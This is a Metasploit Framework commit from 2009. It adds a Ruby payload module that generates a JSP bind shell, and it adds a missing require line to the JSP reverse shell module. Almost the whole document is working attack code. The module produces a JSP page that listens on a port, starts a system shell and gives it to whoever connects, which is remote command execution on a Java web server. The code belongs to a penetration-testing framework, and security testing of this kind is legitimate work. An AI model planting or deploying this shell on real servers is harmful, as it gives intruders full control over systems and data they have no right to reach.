Commit a jsp bind shell payload (and add a missing require to the jsp reverse shell).

git-svn-id: file:///home/svn/framework3/trunk@7220 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-20 23:11:28 +00:00 · 2009-10-20 23:11:28 +00:00 · 995745d642
parent a3c9c5d669
commit 995745d642
2 changed files with 109 additions and 0 deletions
--- a/modules/payloads/singles/java/jsp_shell_bind_tcp.rb
+++ b/modules/payloads/singles/java/jsp_shell_bind_tcp.rb
@ -0,0 +1,108 @@
+##
+# $Id$
+##
+
+##
+# Thin file in part of the Metasploit Framework and may be subject to 
+# redintribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+
+
+module Metasploit3
+
+	include Msf::Payload::Single
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Java JSP Command Shell, Bind TCP Inline',
+			'Version'       => '$Revision$',
+			'Description'   => 'Listen for a connection and spawn a command shell',
+			'Author'        => [ 'sf' ],
+			'License'       => MSF_LICENSE,
+			'Platform'      => [ 'win', 'osx', 'linux', 'unix', 'solaris' ],
+			'Arch'          => ARCH_JAVA,
+			'Handler'       => Msf::Handler::BindTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+		register_options( [ OptString.new( 'SHELL', [ true, "The system shell to use.", 'cmd.exe' ]), ], self.class )
+	end
+	
+
+	def generate
+		# Modified from: http://www.security.org.sg/code/jspreverse.html
+		jsp = %q{
+			<%@page import="java.lang.*"%>
+			<%@page import="java.util.*"%>
+			<%@page import="java.io.*"%>
+			<%@page import="java.net.*"%>
+
+			<%
+				class StreamConnector extends Thread
+				{
+					InputStream is;
+					OutputStream os;
+					  
+					StreamConnector( InputStream is, OutputStream os )
+					{
+						this.is = is;
+						this.os = os;
+					}
+							  
+					public void run()
+					{
+						BufferedReader in  = null;
+						BufferedWriter out = null;
+						try
+						{
+							in  = new BufferedReader( new InputStreamReader( this.is ) );
+							out = new BufferedWriter( new OutputStreamWriter( this.os ) );
+							char buffer[] = new char[8192];
+							int length;
+							while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
+							{
+								out.write( buffer, 0, length );
+								out.flush();
+							}
+						} catch( Exception e ){}
+						try
+						{
+							if( in != null )
+								in.close();
+							if( out != null )
+								out.close();
+						} catch( Exception e ){}
+					}
+				}
+
+				try
+				{
+					ServerSocket server_socket = new ServerSocket( LPORT );
+					Socket client_socket = server_socket.accept();
+					server_socket.close();
+					Process process = Runtime.getRuntime().exec( "SHELL" );
+					( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start();
+					( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start();
+				} catch( Exception e ) {}
+			%>
+		}
+		
+		jsp = jsp.gsub( "LPORT", datastore['LPORT'].to_s )
+		
+		jsp = jsp.gsub( "SHELL", datastore['SHELL'] )
+		
+		return super + jsp
+	end
+
+end
--- a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb
+++ b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb
@ -12,6 +12,7 @@

 require 'msf/core'
 require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'


 module Metasploit3